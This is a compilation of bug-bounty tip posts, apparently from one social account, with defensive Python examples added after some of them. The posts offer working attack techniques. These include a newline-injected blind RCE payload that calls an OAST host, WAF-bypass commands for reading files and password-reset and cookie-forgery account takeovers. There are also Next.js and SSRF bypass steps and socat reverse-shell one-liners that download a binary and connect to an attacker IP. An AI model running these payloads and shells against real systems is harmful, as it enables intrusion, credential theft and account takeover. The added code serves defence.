Never forget to check for blind RCE!
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... the firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE, still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline, URL encoded)
And boom: blind RCE triggered! My server got the hit instantly.
Cybersecurity isn't about effort, it's about mindset. Deep thinking always wins over brute force.
DarkShadow
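The post's hypothesis is that the filter only looked at the first line of the parameter. The following added example (not code from the post or from any real WAF) models exactly that: a naive rule that inspects only the first line and only the classic separators, next to a check that URL-decodes repeatedly and treats CR, LF, NUL and $( as command boundaries anywhere in the value. The command list, the payloads and the example.oast.fun host are constructed; the real fix on the application side is to never pass the username to a shell at all.

```python
import re
from urllib.parse import unquote

# Added example, not code from the original post or any real WAF product.
# Command list is constructed; a blocklist like this is a stopgap, not a fix.
COMMANDS = r"(?:id|whoami|uname|curl|wget|ping|nc|bash|sh)\b"

# Naive rule: only the "classic" shell separators count as command boundaries.
NAIVE_RULE = re.compile(r"[;|&`]\s*" + COMMANDS)

# Hardened rule: CR, LF, NUL and $( also start a new command, and with
# re.MULTILINE a command may sit at the start of any line, not just the first.
FULL_RULE = re.compile(r"(?:^|[;|&`\r\n\x00]|\$\()\s*" + COMMANDS, re.MULTILINE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing, so %250a (double-encoded LF) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def naive_waf_blocks(raw_value: str) -> bool:
    """Flawed check: decode once, then inspect only the first line of the value."""
    first_line = unquote(raw_value).split("\n", 1)[0]
    return NAIVE_RULE.search(first_line) is not None


def hardened_waf_blocks(raw_value: str) -> bool:
    """Inspect the whole, fully decoded value; line breaks are treated as command boundaries."""
    return FULL_RULE.search(fully_decode(raw_value)) is not None


if __name__ == "__main__":
    # Constructed payloads; the oast.fun host is a placeholder, not the one in the post.
    for payload in (";id",
                    "attacker'%0acurl https://example.oast.fun",
                    "attacker%250acurl https://example.oast.fun",
                    "alice"):
        print(f"{payload!r:50} naive={naive_waf_blocks(payload)!s:5} "
              f"hardened={hardened_waf_blocks(payload)}")
```

Running it shows the asymmetry the post exploited: `;id` is caught by both rules, while `attacker'%0acurl ...` slips past the first-line check and is only caught once the whole decoded value is scanned.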
You can find
broken access control / IDOR vulnerabilities using this simple trick (effective for .NET web apps, and it sometimes works in PHP-based web apps too):
target.com/hidden: this page requires authentication or redirects to the /login page.
Try: target.com/login/hidden
OMG! Auth bypass
Password Reset Bypass Trick
Some poorly secured endpoints accept multiple email parameters.
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded

email=<victim-email>&email=<attacker-email>
Or in JSON:
{
"email": ["<victim-email>", "<attacker-email>"]
}
If the app sends the reset link to both emails... you're in.
Now imagine if the victim is an admin: hello dashboard, hello bounty!
#bugbountytips
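The bug the post describes is HTTP parameter pollution on the reset endpoint: the server looks up one account but mails the token to every address it received. The following added example (not code from the post or from any real application) implements both the vulnerable handler and a hardened one for the two body encodings shown above. The user table, the request bodies and the secret are constructed; the endpoint and parameter name come from the post.

```python
import hashlib
import hmac
import json
from urllib.parse import parse_qs

# Added example, not code from the original post. Constructed data:
USERS = {"victim@example.com": "user-1001"}       # email on file -> account id
SERVER_SECRET = b"constructed-server-secret"       # in practice, from a secret store


def submitted_emails(content_type: str, body: str) -> list:
    """Return every 'email' value the client smuggled into the request, form-encoded or JSON."""
    if content_type.startswith("application/json"):
        value = json.loads(body).get("email")
        if value is None:
            return []
        return value if isinstance(value, list) else [value]
    return parse_qs(body, keep_blank_values=True).get("email", [])


def reset_token_for(account_id: str) -> str:
    # Deterministic here only so the example is checkable; real tokens are
    # random, stored hashed, single-use and short-lived.
    return hmac.new(SERVER_SECRET, account_id.encode(), hashlib.sha256).hexdigest()[:32]


def reset_weak(content_type: str, body: str) -> list:
    """Vulnerable behaviour from the post: one lookup, then the link is mailed to every address given."""
    emails = submitted_emails(content_type, body)
    account_id = next((USERS[e] for e in emails if e in USERS), None)
    if account_id is None:
        return []
    token = reset_token_for(account_id)
    return [(email, token) for email in emails]    # attacker's address receives the victim's token


def reset_hardened(content_type: str, body: str):
    """Accept exactly one string email; the token goes only to the address stored on the account."""
    emails = submitted_emails(content_type, body)
    if len(emails) != 1 or not isinstance(emails[0], str):
        return None                                # parameter pollution: reject, do not pick one
    email = emails[0].strip().lower()
    account_id = USERS.get(email)
    if account_id is None:
        return None                                # production code answers identically to avoid enumeration
    return (email, reset_token_for(account_id))    # 'email' is the key that matched the record, never a second address


if __name__ == "__main__":
    form = "email=victim@example.com&email=attacker@example.com"
    print("weak    :", reset_weak("application/x-www-form-urlencoded", form))
    print("hardened:", reset_hardened("application/x-www-form-urlencoded", form))
    print("hardened:", reset_hardened("application/json", '{"email": "victim@example.com"}'))
```

The weak handler hands the attacker a working token for the victim's account in both encodings; the hardened one refuses any request that carries more than one email, and even a legitimate single-email request only ever results in mail to the address the account already has on file.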
Recently disclosed HackerOne critical bug, which can be exploited in a few minutes!
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you guys are interested in simple and smart tricks, never forget to react.
A simple hunt can flip the whole game!
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==
I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow, it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
BOOM! Instantly, we got admin access!
Follow me ...DarkShadow...
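The cookie above is trusted client-side state with no integrity protection, which is why re-encoding it was enough. The following added example (not code from the post or from the tested application) reproduces that edit programmatically against the exact cookie values from the post, then shows the minimal server-side fix: an HMAC-SHA256 tag over the encoded payload, verified in constant time, so the same role edit is rejected. The signing key is constructed.

```python
import base64
import hashlib
import hmac
import json

# Added example, not code from the original post. SECRET_KEY is constructed.
SECRET_KEY = b"constructed-server-side-key"


def forge_unsigned(cookie_value: str, new_role: str) -> str:
    """Decode an unsigned base64 cookie, swap the role, re-encode: the edit the post made by hand."""
    claims = base64.b64decode(cookie_value).decode().strip()      # "{user:darkshadow,role:user}"
    tampered = claims.replace("role:user", f"role:{new_role}")
    return base64.b64encode((tampered + "\n").encode()).decode()  # echo added the trailing newline


def _encode(claims: dict) -> str:
    # Canonical serialization so the tag covers exactly what the client carries.
    return base64.urlsafe_b64encode(
        json.dumps(claims, separators=(",", ":"), sort_keys=True).encode()).decode()


def _tag(payload: str) -> str:
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def sign_cookie(claims: dict) -> str:
    """Serialize the claims and append an HMAC-SHA256 tag over the encoded payload."""
    payload = _encode(claims)
    return f"{payload}.{_tag(payload)}"


def verify_cookie(cookie_value: str):
    """Return the claims only if the tag matches; any change to the payload invalidates it."""
    try:
        payload, tag = cookie_value.rsplit(".", 1)
        expected = _tag(payload)
        if not hmac.compare_digest(tag, expected):            # constant-time comparison
            return None
        return json.loads(base64.urlsafe_b64decode(payload))
    except (ValueError, UnicodeDecodeError):
        return None


def forge_signed(cookie_value: str, new_role: str) -> str:
    """Same role edit applied to the payload of a signed cookie, keeping the old tag."""
    payload, tag = cookie_value.rsplit(".", 1)
    claims = json.loads(base64.urlsafe_b64decode(payload))
    claims["role"] = new_role
    return f"{_encode(claims)}.{tag}"


if __name__ == "__main__":
    print(forge_unsigned("e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==", "admin"))
    signed = sign_cookie({"user": "darkshadow", "role": "user"})
    print("valid   :", verify_cookie(signed))
    print("tampered:", verify_cookie(forge_signed(signed, "admin")))
```

Signing closes the tampering path shown in the post, but the better design is to put only an opaque session identifier in the cookie and look the role up server-side, so that role data never leaves the server in the first place.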
Everyone, let's dive deep into the art of WAF bypass techniques, a must-know skill for every serious bug bounty hunter.
Bypass Series for bug hunters
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts
man /etc/hosts
nl /etc/hosts
less /etc/hosts
more /etc/hosts
strings /etc/hosts
tail /etc/hosts
head /etc/hosts
Follow me DarkShadow
#Bugbountytips #series
Bypass Series for bug hunters
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -r
xargs -d '\n' -I{} echo {} < /etc/hosts
perl -pe '' /etc/hosts
sed '' /etc/hosts
awk '{print}' /etc/hosts
dd if=/etc/hosts 2>/dev/null
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
With the right dork, the whole game changes: recon becomes domination.
Dork:
inurl:search.php inurl:sqlQuery inurl:&
For more, follow DarkShadow
#bugbountytips
This is wild!
You've probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927), but there's another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
curl https://target.com/?__nextLocale=/admin
This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
New Script Alert: Subdomain Monitoring (Coming Soon!)
from Brut Security
For those who've been waiting on a simple and efficient way to monitor subdomains automatically, your wait is almost over.
We've been working on a Bash script that:
- Monitors your target domains every 6 hours
- Uses subfinder, anew, and notify
- Sends actual new subdomains as file attachments directly to your Discord webhook
- Clean, lightweight and made for practical usage in recon and bug bounty
The release isn't today (dropping next week), but thought I'd give you all a heads-up.
If you're into bug hunting, automation, or OSINT, this might be super useful for your workflow.
Share with your team
React if you're excited
Let's get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
API_Hacking_with_Javascript_Checklist.pdf (47.1 MB)
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
Convert your basic nc reverse shell to a pro interactive shell
Bash Series for bug hunters
Part-1
Use Python to spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Use this command so that clear works:
export TERM=xterm-256color
Get a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] '
Use these aliases to speed things up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'
To background the shell temporarily:
Press Ctrl+Z
Use this command to get back to the session:
stty raw -echo; fg
Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
Bypass Series for bug hunters
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hosts
cat /proc/self/fd/0 < /etc/hosts
cat /etc/hosts | base64 | base64 -d
cat /etc/hosts | string collect   (fish shell syntax)
cat /etc/hosts | while read line; echo $line; end   (fish shell syntax)
echo (cat /etc/hosts)   (fish shell syntax)
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
Bash Series for bug hunters
Part-2
Stop using nc directly and try the following command instead:
rlwrap -cAr nc -lvnp <port>
Or
rlwrap -f . -r nc -lnvp <port>
Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
socat file:tty,raw,echo=0 tcp-listen:<port>
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker_ip>:<port>
If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker_ip>:<port>
To stop socat:
ps aux | grep socat
kill -9 <PID>
Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
Follow me DarkShadow
#Bugbountytips #series @brutsecurity
HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata, disclosed and rewarded $25,000!
The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click "Apply" (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks, don't forget to react & share.
Follow me DarkShadow
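The root cause in this class of bug is a server-side HTML-to-PDF renderer that fetches whatever URL attacker-controlled markup points at, including the cloud metadata endpoint. The following added example (not HackerOne's code and not code from the post) is the egress check such a renderer needs in front of every fetch it performs for an <iframe>, <img> or CSS url(): refuse anything that is not http(s), resolve the host, and refuse it unless every resolved address is globally routable. Hostnames, addresses and the stub resolver are constructed so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example, not HackerOne's code or code from the original post.
# The DNS table below is constructed so the example runs without network access.
CONSTRUCTED_DNS = {
    "metadata.internal": "169.254.169.254",   # an internal name pointing at the metadata service
    "cdn.example.com": "8.8.8.8",             # a stand-in for a public host
}


def fake_resolver(host, port=None):
    """Stub with the shape of socket.getaddrinfo, backed by CONSTRUCTED_DNS."""
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror("constructed resolver: unknown host")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (CONSTRUCTED_DNS[host], 0))]


def _is_public(addr) -> bool:
    """Globally routable unicast only; IPv4-mapped IPv6 is judged by the embedded IPv4 address."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def resolve_all(host: str, resolver=socket.getaddrinfo) -> list:
    """Every address a host maps to; IP literals are returned as-is; failures yield an empty list."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    try:
        infos = resolver(host, None)
        return [ipaddress.ip_address(info[4][0]) for info in infos]
    except (OSError, ValueError):
        return []


def is_safe_fetch_url(url: str, resolver=socket.getaddrinfo) -> bool:
    """Allow only http(s) URLs whose host resolves exclusively to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addrs = resolve_all(parts.hostname, resolver)
    # Connect to one of these resolved addresses afterwards (pinning), not to the
    # hostname again, or a DNS rebinding attack can swap in 169.254.169.254 between
    # the check and the fetch.
    return bool(addrs) and all(_is_public(a) for a in addrs)


if __name__ == "__main__":
    for url in ("http://169.254.169.254/latest/meta-data/",
                "http://[::ffff:169.254.169.254]/latest/meta-data/",
                "file:///etc/passwd",
                "http://metadata.internal/",
                "https://cdn.example.com/logo.png"):
        print(f"{url:52} allowed={is_safe_fetch_url(url, fake_resolver)}")
```

This check belongs in the renderer's network layer (a request interceptor or an egress proxy that the headless browser is forced through), not in the HTML sanitizer: the payload in the post was valid HTML, and the only thing wrong with it was where the fetch went. Running the renderer in a network namespace with no route to link-local and private ranges is the defence-in-depth layer behind it.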
This is really cool
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity